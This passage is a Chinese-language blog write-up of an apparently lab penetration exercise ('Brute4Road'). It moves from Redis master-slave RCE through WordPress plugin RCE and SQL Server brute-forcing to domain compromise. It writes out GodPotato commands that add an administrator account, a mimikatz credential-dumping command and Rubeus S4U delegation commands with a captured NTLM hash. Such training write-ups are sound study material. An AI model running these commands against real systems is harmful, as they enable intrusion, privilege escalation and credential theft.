Skip to content

Brute4Road

image-20260311135907704

扫出redis未授权登录

用redis-cli.exe连接

image-20260311141636956

搜了一下redis未授权登录利用方法,一种需要知道web目录,但我试了一下不在常见的目录下,两种需要root运行redis,但我连切换root目录都做不到显然不是root,最后一种是主从复制,主要影响Redis 4.x至5.0.5版本image-20260311141916055

但是这里是5.0.12明明版本不符合但不知道为什么也能利用主从复制

用redis-rce-master工具成功获得shell

image-20260311183640466

image-20260311183734650

成功反弹shell,打开root显示权限不够,看来要提权了,试试flarum靶场的用capabilities提权

1
getcap -r / 2>/dev/null

没输出任何东西

试试suid提权GTFOBins(这个网站可以查看可用的命令)

image-20260312101706197

有base64,用base64提权

image-20260312101809742

成功拿到flag01

扫一下内网下

image-20260312103528701

梳理一下要打的目标

1
2
3
4
172.22.2.3 DC
172.22.2.16 MSSQLSERVER
172.22.2.18 WORKGROUP\UBUNTU-WEB2
172.22.2.37 XIAORANG\CLIENT01

用wpscan扫一下UBUNTU-WEB2

image-20260312144009336

发现wpcargo插件GitHub - biulove0x/CVE-2021-25003: WPCargo < 6.9.0 - Unauthenticated RCE · GitHub

image-20260312152546496

又nm被网络问题卡了一小时,以后渗透再也不用实验室的网了

image-20260312153017081

注意这里连接类型为CMDLINUX

可以可以被阴了一手,不知道为什么这里显示出来的是config.php,

image-20260312153939890

但这些php前面全部都是有wp-打头的,我还以为没权限找了半天咋提权

image-20260312154026110

wp-config.php有数据库用户名和密码

image-20260312155435706

但是奇怪的是不知道为什么navicat连不上,但蚁剑能连上

image-20260312172219822

image-20260312172241637

导出,爆破一下MYSQLSERVER

image-20260312172306751

爆破最好每两百个密码一个文件,分批次爆破,因为全部塞一个文件fscan爆破一半就不会爆破了。

image-20260312172956128

image-20260312180002550

土豆提权只需启用了SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege,这里有SeImpersonatePrivilege可以用土豆提权

image-20260312180147166

image-20260312181419735

注意命令格式要正确

1
2
C:\Users\Public\GodPotato-NET4.exe -cmd "net user bug bug@ /add"#这个@是密码的一部分
C:\Users\Public\GodPotato-NET4.exe -cmd "net localgroup administrators bug /add"

rdp一下

1
C:\Users\public\GodPotato-NET4.exe -cmd "cmd /c C:/Users/Public/mimikatz.exe log privilege::Debug sekurlsa::logonpasswords exit"

mimikatz抓取一下哈希

image-20260313222711689

哈希653110e5754731cbf7539297bf3f4ac3

通过BloodHound分析可知MSSQLSERVER对DC有约束委派(但我BloodHound老生成不了正确的zip)

域渗透之委派攻击全集-先知社区

约束委派

如果B设置了msDS-AllowedToDelegateTo的值为服务C,那么B就能伪造任意用户访问服务C,这就是S4U攻击

如果已经拿下了B的控制权,只需三步即可拿下服务C

1.获取当前机器账号或者服务账号的哈希

2.利用获取到的哈希向DC申请TGT

3.利用TGT向DC申请ST下面就是实操

1
.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:653110e5754731cbf7539297bf3f4ac3 /domain:xiaorang.lab /dc:DC.xiaorang.lab /ptt /nowrap

image-20260313223103964

1
.\Rubeus.exe s4u /user:MSSQLSERVER$ /rc4:653110e5754731cbf7539297bf3f4ac3 /domain:xiaorang.lab /dc:DC.xiaorang.lab /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /ptt /nowrap

image-20260313224211215

1
.\mimikatz.exe "kerberos::list" "exit"

image-20260313224243426

image-20260313224304887

About this Post

This post is written by DashingBug, licensed under CC BY-NC 4.0.